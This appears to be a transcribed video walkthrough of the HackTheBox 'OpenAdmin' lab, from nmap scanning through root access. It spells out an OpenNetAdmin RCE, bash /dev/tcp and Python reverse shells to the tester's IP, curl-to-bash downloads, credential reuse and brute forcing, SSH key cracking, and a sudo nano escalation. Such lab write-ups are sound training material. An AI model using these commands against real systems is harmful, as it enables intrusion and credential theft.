What's going on YouTube? This is Ipsec. I'm doing OpenAdmin from HackTheBox, which was marked as an easy box, so with the recent edition, I haven't done this box before and I didn't do any preparation. This will be my first run through of the box. That being said, these intros are recorded after I've done everything, so I know the general gist of it. We're going to start off by finding a web server. We do run GoBuster against it to discover it's running OpenNetAdmin, which has a RCE against it. We use that RCE to run commands on the box, and we'll fumble around quite a bit because of URL encoding, but eventually we get a reverse shell on the box. With that reverse shell, we do a bunch of enumeration, find out the database password has been reused as one of the user accounts, log in with that user, and discover there's a hidden web server on the box, access that web server to run commands as a third user. It's www.data, Jimmy, and then the third user being Joanna, and log in as her to discover that she can run sudo with nano, use GTFOBins, and get root that way. So with all that being said, let's jump in. As always, we're going to start off with the nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it OpenAdmin, and then the IP address, which is 10.10.10.171. And I actually don't have the nmap directory created, so I'm going to create that and then run this command. And since we're doing this live, I'm going to add the -v flag so we see open ports as it does find it, because nmap every now and then can take a while. I'm also going to do sleep 300 and then the nmap again, but this time do -p- to do all ports. And then we can do OA, put in the nmap directory, call it OpenAdmin -all ports, 10.10.10.171. And I guess I can kill that sleep because nmap finished wickedly fast. So let's go look at the results. And we just have two ports open. The very first one being SSH on port 22. And it's running OpenSSH 7.6 Ubuntu. And we also have HTTP on port 80. And it's just running Apache. So let's go take a look at the website, 10.10.10.171. And we just get the Apache 2 Ubuntu default page. So I'm just going to check like robots.txt real quick to see if that had any quick wins. Doesn't look like it does, so let's copy this and throw it over to GoBuster. So I'll close that window, go to a new one, and we'll do GoBuster, dir for directory mode, -u URL, and then -w for word list, user share word list, GoBuster, then directory list 23 medium.txt. And I also want to see if this is like PHP. So we do index.html, we get this page. If we do .php, it's not found. We could try ASP, but there's no way that's going to be running on Linux. So I don't know what extensions on the server, so I'm not going to do the -x flag to include extensions because that would just take forever. So I'm just going to call this gobuster-root.out, and we'll let that run. We do have a /music, so let's go check that out. Going over to /music, and looks like we get a page. We can potentially create an account or log in. Clicking each of these links, we do go to various pages. So the very first thing I'm going to do, press Ctrl-U to look at the source to see if I can figure out what type of content management system this is. We can try index.php, not found. Looking at any of the links it brought us to, everything is on .html right now. But I just want to see, like, do I see wp-admin or something that tells me what software this is running? Doesn't look like I see anything immediately apparent in the source. This is colorlib. So let's see. I'm going to open up Cherry Tree and we're going to start taking some notes. So Control-N to create a new node, call it OpenAdmin, and Control-Shift-N to do child node. And I'm just going to paste colorlib and put potential dependency /plugin. And let's just get out of the source. We do have owl.carousel, so we can also copy this. Carousel is a popular like WordPress plugin. So let's scroll all the way down and look at the footer to see if we have anything. So colorlib looks like how the template is made. And we don't really see too much more. So close this, close this. Let's try logging in. We get ONA. You're not running the latest version. Please download. And look at this download link. It's going to OpenNetAdmin. So it does disclose the version. So we can go here and we can say OpenNetAdmin, that version. So let's go to searchsploit and see if we have anything. So searchsploit ONA first. I'm just going to say OpenNetAdmin, see if that filters out some of that noise. And we have 130301. Going back here, we are running 1811. I guess we can try this. Maybe it won't work. Maybe it will. Searchsploit-x. I'm actually going to just do mirror. X would just bring it up so we could see it. But we can mirror it to copy it to our local directory. And then we can open up in VI in case maybe it did syntax highlighting. Doesn't look like it does. Let's see. So setting the module path. Proof of concept. Come on. Input hidden options file. It looks like this is going to be a like cross-site request forgery type thing. I hate when exploits expect you to make the HTML page, so we can do this real quick, but I'd much rather them just have like a Python script or something. Let's just cat it to make it easier to copy. Copy this, and we can show exactly what it's doing. We could manually craft this and make it a, what is it called? Burp command, but it's easier just to make the HTML page and then go to it. So I'm going to do index.html, set paste, paste this in, Python 3-m http.server 80 to run it on port 80. And if we go to localhost, we now have this. So I'm going to make sure my burp suite is set to intercept on. If we click exploit, it's going to make the page. Click send, error response, unsupported method, post. We don't want to go to localhost. So this URL is going to be 10.10.10.171. And we can go to proxy, sure, 10.10.10.171, ONA, DCM, that's good. And the command we're going to get, I'm just going to do PHP info, or we'll do echo, please subscribe. I hate jumping straight for like a dangerous command. I always like doing an echo first because that way, if PHP safe mode or something is on, we can still see our code execution works. Going to repeater, still going to localhost. Let's change this to be, wait a second. 10.10.10.171, please subscribe. That's there. I wonder if it didn't obey the, whatchamacallit, Control-Shift-U to un-URL encode it. It should be posting to a URL, so we'll just manually put that. So we can just say /ONA DCM, and the host, when we send this to repeater, we can click here. And this is now going to go to 10.10.10.171. Send this, no module specified. So this exploit doesn't look like it's going to work. Big shocker because it's not up to date. I'm going to do searchsploit-u to update, and we'll see if anything else comes back. I'm not sure when the last time I updated this actually is. So just run that. And we can also just Google for like OpenNetAdmin exploits. So OpenNetAdmin exploit 1811, and that's off exploit.db. So this is looking much more possible than the other one. Once we update searchsploit, it should work, because searchsploit is just the exploit.db database. But let's go look at this. It's a bash script, so that's good. Copy. Let's see. This window will be called searchsploit. I'll just go back to that in a little bit, and we'll do v exploit.sh. Paste this in. And I'm actually going to put this curl through a proxy, because I'm not exactly sure what that's doing. And curl proxy. We'll just scroll down till we see something we want. Proxy insecure, negotiate, no. There are a lot of options that have proxy with curl. Tons of options. Wow. Proxy user, okay. -x. And we specify like HTTP colon. Okay. So let's go here. We can do -x HTTP 127.0.0.1.80.80. So this should send it through the proxy. And I always just like sending exploits and stuff through the proxy, because that way I can see exactly how it works. And I don't have to understand whatever the heck they did with like running a bash command or something. It's just easier for me to understand this. So if I do who am I? Oh, we probably have to change the URL. Where's it getting URL from? argget1. So 10.10.10.171. Who am I? There we go. So we can see it doing a post. So let's send this to repeater. Click go. And we get a bunch of junk. Let's see. Echo begin end. So if I search this for begin, don't get anything. For the request, nothing. Weird. ID, host name, echo test is expecting PHP. Let's go look at this. Well, true. Oh, we probably need /ONA. So if I go back here, what is this? Yeah, if I paid attention, this is the Apache 2 default page. So over here, I was specifying the full directory. So let's just do post to /ONA. Okay, if we search for begin, and then end. So all this command is doing now, it's so much easier to understand now that I see what's going on. We're doing this curl. Here is the payload, and it's echoing begin, and then it's echoing end between the command we run. And the reason why it's doing that is because we're sending it to sed, and then we're grabbing everything between begin and end. So that's essentially what is happening. So we can run this, put it through the proxy. Who am I? Forward. Oh, /ONA. Who am I? There we go. So now we have this shell. Searchsploit. What? Don't restart that. I don't know why it wanted to. Snoo Cali, man. Okay. So let's get a proper reverse shell, because this is sending an HTTP request every time we try to do something, which isn't really the greatest, because if we try a command like su, we don't have like a full TTY. So let's make a shell. So nclvnp 9001. I'm going to do bash-c, then single quote bash-i, dev tcp 10.10.14.2, I believe. Config ton 0. I am 10.10.14.2, 9001, and I think it's 0 at and 1. Let's see. Send that. That did not work. Let's see. Pentest monkey, reverse shell. Bash-i. So if you can't see that, I think I did type it correctly. So what I'm going to do we have nc? We do. So I'm going to run nc lvnp 9001 and nc 10.10.14.2 9001. So first I'm going to see if we can connect. This is testing like the firewall. So I know it's not the firewall preventing us. So it's probably this command. And we have a lot of bad characters in this command. So what I'm going to do is convert this to base 64. So echo-n, paste that. We can put that in single quotes. Okay. Base 64. And we can copy this. Echo-n, paste, base 64-d, bash to execute. nc lvnp 9001. And it doesn't look like that worked. So maybe this reverse shell doesn't work. Let's just try a different one. We can try this, see what version of Netcat is installed in the box. Something tells me it's not the one with the -e flag. We probably also have to... Do we have -h? No. nc-e. I wonder if we can do -h to 1 like that. nc-h to and 1. Nope. I was trying to direct like standard error to standard out. So bin sh 10.10.14.2 9001. Which bash? Do I have bash on this? I do. I'm not exactly sure why that one command didn't work. Why this reverse shell doesn't work. And my VM is going awfully slow. Let's see. Ever since I started that searchsploit update, kill GoBuster. I'm just going to Control-C this. So searchsploit, OpenNetAdmin. So now we have multiple. So my searchsploit just wasn't up to date. That's why it didn't show it. But now my VM is going much quicker that I killed that. So let's see. We can try this reverse shell. And I'm going to paste it down here so we can edit it. 10.10.14.2 9001. If I can type. Copy. Paste. Looks good. Does not get a shell. I wonder if there's some weird IP tables rule on this. That one normally works. Let's exit here. Go www v test.py. This should be a Python reverse shell. Curl, let's see, Python 3-m HP server 80 curl 10.10.14.2 test.py. Okay, if we direct that to bash, and then we have to edit the port and IP. Okay. Let's just run curl 10.10.14.2 test.py pipe to bash. That shell works. But for some reason that doesn't work. So in my notes, why can't www data get a reverse shell? Which bash, lsla, bin bash. Anyone can execute this. So I was thinking maybe I didn't have permission over bash, but that's clearly not the case. I'm running out of ideas. I'm just going to run this one command, and then we're going to just move on. Wait, let's see. Echo test, grep for test. So the pipe works. Echo blah, grep test. Yeah. So we don't have any bad characters. That's what I was testing right there. Because maybe that was a bad character. I wasn't actually doing that. But no. We could get rid of this. If I do this curl command again and just pipe it straight to Python, that should work. 9001 curl 10.10.14.2 test.py Python. Nope. Which Python? Which Python 3? Curl 10.10.14.2 test.py Python 3. Is the script Python 3 compatible? Oh. Okay, script is Python 3 compatible. Doesn't work. So the super weird thing is oh, there we go. I don't know exactly what happened there, but I'm going to go with this because I don't know. Maybe there's an IP tables rule that prevents bash from talking out. That's very possible. But then curl wouldn't work. I don't know. But we have a shell, so huzzah. Python-m import pty.spawn then bash Python 3-c import pty.spawn then bash. There we go. stty raw minus echo, hit fg enter twice, and now we get on this box. I'm going to export term is equal to xterm, so now we can clear the screen. And I'm going to go to Etsy, find.grep IP tab. I was looking for like an IP tables rule. Doesn't look like we have anything. So let's just go back to the directory. And what I did there was cd space dash, which is your previous working directory. So let's see. Let's run, what is it? Linux. So cp opt, let's just go cd opt privilege escalation awesome suite, get pulled to update it. cd linpeas, linpeas.sh is there. So we can copy this to root, htb, boxes, OpenAdmin, www. And then we can curl 10.10.14.2, linpeas.sh, pipe it to bash. This should finish pretty quickly. Looks like we have Jimmy logging in on the box quite often. Let's just go to the top. Curl. Come on. There it is. So let's see. We're www data. The kernel. Where's the compile date? November 12th, 2019. Kernel. Just a note for once we pop this box to look at it. I'm going to laugh if it's just something I was doing wrong. But it happens every now and then. New path exported. I don't know why it's saying that, but it's not highlighted, so I'm going to ignore it. Let's see, processes on the box. Apache. I wonder if there's like a cron tab killing my bash. And that's why the reverse shell didn't work. But it should have still called. Huh. Looking down. System D timers. Nothing too interesting. Where that's hard-coded for archive.ubuntu.com, so they probably pulled an old package from something. We got MySQL. And that's probably going to be where I start is the MySQL, because we're on a web server. It's always helpful to enumerate the database. We got logins. Root Jimmy Joanna. So root Jimmy Joanna. Logged into the box. And we can go back to interesting, is it capital F? Yep. Let's see. Oh, so many setuid files on this thing. But none of them look unique. It highlighted a bunch of these because, like, if this is the version, this version then is vulnerable, I think. But I don't see anything that would be vulnerable to us because most of those are old dates. Like at with the CVE of 2002. So I'm guessing that at binary is up to date. Let's see. Looks like we can capture packets potentially. Unexpected folders in /root/CD-ROM. Weird. Writable. So we got a log file we could look at. Backup files. Backup.txt. That doesn't look too interesting. I guess we can copy it. Let's see, hidden files, nothing there. Owned by me, that's writable by everyone, not in home. So I'm guessing since we can write that bin, we can probably change something in this OpenNetAdmin. If we restart the web server, we could execute it. Maybe that's why that directory has a bin. But this is just highlighting bin because we can write to a directory called bin, and generally that's bad. Let's see. Oh, I saw colors. Okay, that's the path. Okay, don't really have that much. So let's go opt ONA bin, see what's in here. Touch test. So we can write here, but again, there's no binaries. So if like ONA had a web server that was running out of bin, and we could rewrite that web server to be malicious code and then restart the web server and it executes this, that would be a thing. But there's nothing in here. So that's not a finding. So let's see. MySQL was the thing. So let's go ... and look for config. Find grep config. Config. There's a few config files. Probably config.inc.php. Okay. Let's see. Quite a bit in this file. Site configuration. So what I'm looking for is the MySQL information. So we can probably just do /password. Nope. grep-i pass. MySQL. SQL. Let's see. grep-r for recursive. Password. grep-i SQL. What if we can just do MySQL root -u root -p toor root no. Let's see. Local config database settings. That sounds better. There we go. So db password Ninja Warrior localhost. So let's do MySQL-u ONA sys-p Ninja Warrior. Okay, we can go up here. Creds, ONA sys Ninja Warrior. Show databases. Can we do use users? MySQL. I was seeing if I could access like the MySQL table to get user information. Not CD. Use ONA default. Show tables. Let's do describe users. Select ID, username, password from users. And we got guest and admin. Copy. Paste that. And let's just go to hashes.org and search. This looks like just MD5. That looks like 32 characters. So let's copy. Let's do hash, search, paste, paste, YKWSKD3. Huzzah! We got test and admin. So this is test, and this is admin. So if we had went to this, log in, and changed, we could probably do admin, admin, and log in as admin. Don't know what that really buys us, but hey, we could log into that. So default creds on that. Don't really have anything else in the database probably that we want. I'm going to Google real quick to see if maybe there's a command I missed to extract credentials. I'm pretty sure it's either in a database called MySQL or users. MySQL command dump users, list users, show users. Okay. Yeah. So we don't have permission. That's the command, access denied. So we need the root MySQL user to do that, which we don't have as creds. We could try Ninja Warrior with root on MySQL. Let's see, ONASys, root, access denied. So don't have that. Let's cat etc passwd. And I'm going to grep everyone that has a shell of bash. I'm going to do awk -F for field separator, print 1. That was ugly. I'm going to hate myself for doing this because I always forget the command. Do stty-a. So what you saw there was my rows and columns aren't set. So bash didn't know how to go all the way to the end, so it started overwriting. So stty-a will print that information. I can do rows 37 and 146, and then cols 146. Come on, type. Hey, I think I did this first try. I guess I've been doing these videos for a while. So now you can see my thing goes all the way to the end correctly. But we have 3 users. So what I'm going to do is copy these. Come on. We can go over here to this bash session, vusers.txt, paste, and we can copy the credential, passwords.txt, test admin. Those are all the passwords we know. And I'm going to run a tool called Medusa -h. Let's see, 10.10.10.171 -U, users.txt -P, passwords.txt, and -M for module, SSH, and then the IP. So this should now attempt to crack. And it's going to try all those passwords for each, and we get Jimmy is that password. So we can log in with that. If we didn't have SSH open, we could always use a program called sucrack. I think I have it on Kali. Whoops. Yep. So let's copy this to www. And if we go to dev shm, wget 10.10.14.2 sucrack, chmod +x. Can we execute it? We can. So let's do let's call it pass.txt. Put a few in, and we have to grab the actual password. And let's see, /sucrack-aw20. I'm just copying what's here. I don't know what these are actually doing, but it's in the example for how to run this program. The main reason I don't like sucrack is I don't think it accepts users as a list, so you'd have to run it for each user, but it works like that. Pretty awesome. If the user wasn't this, if we did, come on, copy, Shoot. It screwed up my TTY. So all I typed there was reset to get it back. So, not sure exactly why this program is breaking it. Oh, probably because it's doing something like that. And yeah, oh well. It does something weird with the TTY, so you may have to type reset after it. So if I do Jimmy, and now when I type, you can't see anything. But if I type reset enter, fixes the TTY. So that is a super handy command, especially when you do this TTY madness. But let's go su Jimmy and go to the password. So this should be SQL, and this is, I guess, local Jimmy. Paste the password in. It's not on my clipboard. I guess we don't have to use su. It's probably best we don't use su, and we just SSH in. And I say that because it's just going to be a better shell when I'm SSHing in, because I don't have all this weird Python import TTY magic. So I'm just going to exit out of everything. I'm just going to exit the whole pane. And now, if we do a PSEF, you don't see that weird Python reverse shell because we exited it. So now that we're on Jimmy, see what he has. Find dot, type f dash ls. We have nano search history. And nothing really in that. So let's run the I'm just going to look for set UID binaries. I was going to say LinPEAS again, but the main thing I want to look for is set UID binary. So /-perm, I think -4000. And then to dev null. We don't want to see any error messages. We need /dev null. So these are all the set UID binaries on the box. Let's see. Is there anything here? Key sign at. Don't really see anything. And we don't have user.text in here. So I'm guessing user.text is in Joanna, but we don't have access to her yet. So let's see, find dot dash readable dash u Jimmy. That's going to print everything readable. Let's see, find show files owned by user. It's probably like dash u. Let's see, dash group, probably dash user. Find / dash user Jimmy. So I'm guessing it's going to be this right here. And did we miss something? LNPT. Oh yeah. We have the super high port, 52846. Did I see this in my previous session? I closed it. Let's see. Curl 10.10.14.2, linpeas.sh bash. So we got a high port that we probably skipped over for whatever reason. Mistake by me. but that's probably running this web server. And I thought it was a different web server because it's var www internal, whereas the other one is opt ONA. So let's see. We can cat main.php to see what this is. And that's just going to grab Joanna's SSH key. So, oh, we have to create a session probably. If is set session username location index.php. So if I curl 127.0.0.1:52846 / main.php, I get the key. What? PHP session start. I was pretty sure this would not work because that maybe that needs doesn't want the exclamation point there. Let's see. We got the key. Let's save this real quick and then let's play with it because I'm assuming it shouldn't have been that easy. Let's see. SSH Key. So should be able to edit this file because we own it. PHP session start. I'm not exactly sure why that's doing that. Oh. Because it's not, doesn't have a die. So we did a semicolon here, die. Doesn't work. So what they're doing is they're just telling a browser to say, put this header index.php, and they don't die, which means the script continues and it puts information. So let's see. Yeah, so this is a 302 redirect right here, right? HTTP 302 found. And it's telling us to go to index.php, but puts the rest of the script anyways. So I'm going to hit the squiggly and C to go into an SSH command mode. So if we hit enter, because you have to be on a new line to do that, I'm going to do -L to do local port forward. We're going to say listen on port, we'll do 9002 and forward to 127.0.0.1. And this port was like 54 something, 52846. 52846. So now if I go to localhost 9002, we get this page. So if I went to /main.php, it redirects me because my browser is thinking, it reads that header and redirects. But again, because, it's probably configured not to do localhost, but you can see it's not intercepting because the proxy is ignoring anything on localhost, most likely. But you can see the header right here and then the content. So yeah, they needed that die command because without that die, it just sets the header and continues. So out of curiosity, I bet if it was a static username password on login, var internal index ob session start. Come on. Jimmy, and that is a long password. So let's see. Because this is 0E, I think I know exactly where this is going. We probably don't have to crack this hash. This is probably like a SHA-512 hash. Echo-N, WC-C, 128, echo test SHA-512 sum. That's... I don't know what that is. I bet if we looked at that source, what it does with a username, we'd find out. Let's see. Post password. Oh, that is SHA-512. But we just need a password that begins with 0E. Because PHP has a triple equal thing, and it has a double equal thing. With double equal, it's going to be loose type comparison, and PHP is going to read 0E and think that's 0 to the exponent, which is always going to be 0. So I guess we could potentially show it. PHP-A, if 0 is equal to 0E stuff. I think this is gonna be PHP echo match. If 0 is equal to 0E, like that. Let's see. So, yeah. So, this PHP is saying matches. But if we change it to triple equals, it doesn't. So all we need to do is find a hash collision with this. Which, maybe we just get the hash straight away. SHA-512 hash 0E. Magic hashes. So this is probably the blog post. SHA-512. Come on. Maybe not. Sometimes I wish I just moved on and didn't try to show everything. Let's see. I don't see SHA-512 here. We can just try this, but I don't think this will work. Echo-N, SHA-512. No. So we can try echo. What was it? The command hash and then password. Hash. And the password is this. That. That's not it. And I forgot to terminate a quote somewhere, and I have no clue what I just did there. So go up. Let's see. Echo SHA-512. There we go. And I guess my clipboard was screwed up and I just didn't notice. There we go. If you could hear that, I'm just taking my watch off because it keeps vibrating and has distracted me. And now that I took my watch off, my phone's vibrating and distracting me. So I just threw that behind me. Let's see. Nothing there. I guess we can just try going to what it said it was. If we grab this and we can try, one of the sites said it knew the hash to this. So MD5 hashing, hashgot. Looks like there was a leak right here. People posting potentially the solution would be my guess if they have this hash. SHA-512, here we go. Ah, no. This is a horrible website. Revealed. Got it. Oh, man. So, let's see. We go localhost, username, is it probably Jimmy, and revealed. And then we get this page, which is the hash. It says, don't forget your ninja password. And again, you didn't need to do all this because they forgot that one die command. But hey, we did it the right way. And let's see, we can probably write index. And just to prove this whole revealed thing, we're going to... I don't care if I break the challenge because it's on my private lab. I'm deleting a bunch of this hash. So revealed in no way should match this hash again, right? We're going to both agree that that's not going to match. However, we do new private window, localhost 9002. See, is revealed. It's no longer my clipboard. Jimmy, REVEALED. Ooh. Maybe I'm wrong with that. Or I typoed something. Jimmy. Yeah. I don't know why that's not working anymore. So I guess you need to know the password, and that was just a big rabbit hole. I wish now I saved that hash. What if it's just one thing? I actually am... It's breaking my understanding of how that whole vulnerability works, but we didn't kill too much time on it. When comparing hashes, you should always use a triple equals. But maybe it's because this is now too long. There is a way to get that hash back. Boom. Now we got the hash back. DW, paste. Okay. So now it works. But why? Let's see. Go back here. This is actually localhost, Jimmy. Copy the password. Let's just change one character. This one will be a 2 now. Well, again, yeah. So I'm not exactly sure what's going on there. Let's see. Put it just 0E. Yeah, I'm not going to spend any more time on this because obviously it's not working, but it was 2 zeros. Try 3 equals. Does this break anything? If it doesn't break anything, best practice is to use it. Does not. So, I'm not sure what's going on there, but that should be a thing. It's just not for some reason. Maybe like a newer version of PHP fixed it. So let's do SSH Key, set paste. I'm really confused because when I was doing that, Right here. Echo match. Where is it? Yeah. Like, that showed it working, but okay, let's just move on. We got that SSH key. Let's try using it. And it said, don't forget your Ninja password. So I'm just going to try Ninja on this key. SSH.key, SSH-I. We're going to try Joanna. So we can exit this, exit this. How do we spell Joanna? Like this. SSH.key, Joanna at 10.10.10.171, Ninja, and that does not decrypt it. So let's SCP this key over to my cracking rig, and we're going to go into John the Ripper, and grab SSH. I think it's SSH ng to John, root, and we called this sh.key. Call this root OpenAdmin.sh, and we can John -- word list equals opt word list rocku.txt and root OpenAdmin.sh. It's probably just word list, not plural. There we go. And we get the password Blood Ninjas. So we can exit this and put the password Blood Ninjas, and we get in. And the reason why I was knowing this was Joanna's key, because if we went all the way back to var www internal, looked at main.php, it's doing shell exec on Joanna's key. And I'm guessing this Apache is running as Joanna. psef grep jo. See, systemd user. Not exactly sure why Apache can read that. But now we're Joanna, and we got user.txt. We do find dot, and we have local share nano, so less local share nano again. That's just a directory. Find dot dash type f to only show files, and doesn't look like anything here. So find slash, what was the find command? History grep find dash user Joanna to dev null. So ls should be here. Let's see. Groups. Okay. I just saw the LXC stuff and thought we may be in that group. So grep -v lxcfs. Let's just ignore that. We can probably ignore proc. I thought I would have ignored both of those. Oh, misspelling. And we can do /sys. Now I got much less. And nothing really sticks out here. I'm just looking at files that Joanna owns and don't really see anything like we did with the last thing. Let's see. Find. Let's do find file between 2 times. Let's see. Dash newer, not newer. Okay. So slash dash newer mt 2019 probably. 0928, not newer MT. It's November 11, 2019. Hope I didn't screw that up. 10 -ls to dev null. So I'm just looking at files modified between those two dates to see if there's anything interesting. We can go back a few days. Don't see anything. So let's do curl 10.10.14.2 linpeas.sh, pipe it over to bash. While that runs, a long time ago I ran linpeas here. And we did miss the port. If I ran like Chisel, from this shell, I could have done probably a reverse tunnel and brute force this. So I probably didn't need to get on Jimmy. I could have guessed, or I wouldn't have had the password, but if I ran GoBuster against it, I would have got main. And if I looked at the HTTP request, I would have seen that the 301 or 302 redirect had content at the end. So you never needed to get to Jimmy. You could have bypassed that step because of forgetting that one die thing. As long as you noticed the, what's it called? The port. So, let's see. Let's let this keep going. Username string. Okay. IPs inside logs. That's funny. I guess, I don't know what that MQ thing is, but showed up. See, files owned by me and writable by everyone. Bash histories to dev null. Let's see. Set UID things again. SSH key. Oh, sudo. User Joanna may run the following commands on OpenAdmin. Nano. So sudo bin nano opt priv. And let's see. There's probably some hotkey to escape nano. We could probably just do Control O and write to like root.ssh. I was trying to open a file. That's out file. Is it I? Write out is Control O. So we can probably write to an SSH key, but I don't want to break the SSH key. Follow to insert from, which is Control R. So root.ssh ID RSA, not found. Probably do root.text, and read the file lag that way. Etsy passwd. We could, or Etsy shadow. And we could steal the root thing. And again, all I was doing was Windows key R. There's got to be a way, nano escape. nano execute bash. Running shell scripts from nano. Okay, up nano my file. Okay. Saving and then executing from the prompt. Giving script permission. It's not it. Sure, there's a way to do it. Console within nano. See the X1 at F7. This talking about switching terminals. How do I exit nano? Don't save. So what I'm going to do is we're just going to sudo nano, and we're going to read from var, what is it? Var spool cron tabs. Spool cron tabs root. Not found. So we can do 1, 2, 3, 4, 5, and bash -i bash -c 10 10 14 2. Whoops. I think way back in the video I forgot to do a quote. I think that was it. Echo, no. Bash -i dev tcp 10 10 14 2 9001 0 and 1. Okay. Write out file to var spool cron tabs root. Save on a different name. NC LVNP 9001. And we'll see if we get a... Oh, wow. I just bashed inception there. I didn't need that bash -i. That's probably not going to work. Let's copy and paste this and see if it does. No. Yeah. Get rid of that bash -i. And then we don't need those quotes. Yep. I don't know what I was thinking as I was typing that. I probably got sidetracked. But var spool cron tabs root. And we can delete this bash -i. There we go. I did not save it to where I wanted to. Var spool cron tabs root. Yes, different name. Yes, overwrite. Okay. So now on a new minute, we should get this. And I probably just missed it. See, I was just looking at the menu items again to see if there was a execute. I'm actually surprised there's not a way just to escape nano. GTFOBins. Nano shell. Control R, Control X. Let's see, what time is it? We can wait 10 seconds and then try that second way. 10 seconds now. 1, 2, 3, 6 seconds. Is it going to give us a shell at the new minute? Nope. But Control R, Control X, command to execute, bash. Reset. Colon. Continue, yes. So what's it saying? Control R, Control X, command to execute, reset, and then SSH 1 to 0 to 0. Hey, we got a crappy shell, but it is a shell. So cd/root, root.txt. Cat var spool cron tabs root. Not exactly sure why that didn't work. IP tables -L. And nothing on IP tables. I'm honestly not sure why these bash reverse shells are not working. I type bash here. Okay, I'm in bash. Reverse shell. Worked. Let's see. Let's see if I do bash-c, is it going to work? Connection refused, so yes. So honestly, I am baffled why the reverse shell as www data doesn't work. I know there's a way to do the su command to force a shell, but I can also, since I don't care about security on this box, give this guy a shell instead of trying to hunt the flag. Okay, I am www data. Am I going crazy? This command literally worked. Go all the way back here. Where's the... Is it 4? Here. I am listening. No shell. Okay. So I'm not going crazy. That does not work for some reason. It's probably within the exploit itself, now that I'm thinking about it. So we could see how curl is handling this. So I think we're going through a proxy. If we turn intercept on, awesome, good repeater. Let's convert selection, URL encode all characters. Sure. Waiting. And we get a shell. So it was definitely some type of encoding issue we had before that we had to do Python. So wasted a lot of time in the beginning. If we just sent it over to bash like this, it would have been a lot simpler. So again, if we exit this shell, restart this, and run it without the encoding, Let's go to the proxy tab. So run this. Don't get anything, but again, encode all of these characters. Probably just have to press Control U. Let's try that. Yeah. So URL encoding thing with that, and that's why we couldn't get the shell using bash. But for Python, it worked. So there was something weird going on there, but at least that mystery is solved, and that will be the box. Hope you guys enjoyed the video. Take care, and I will see you all next week.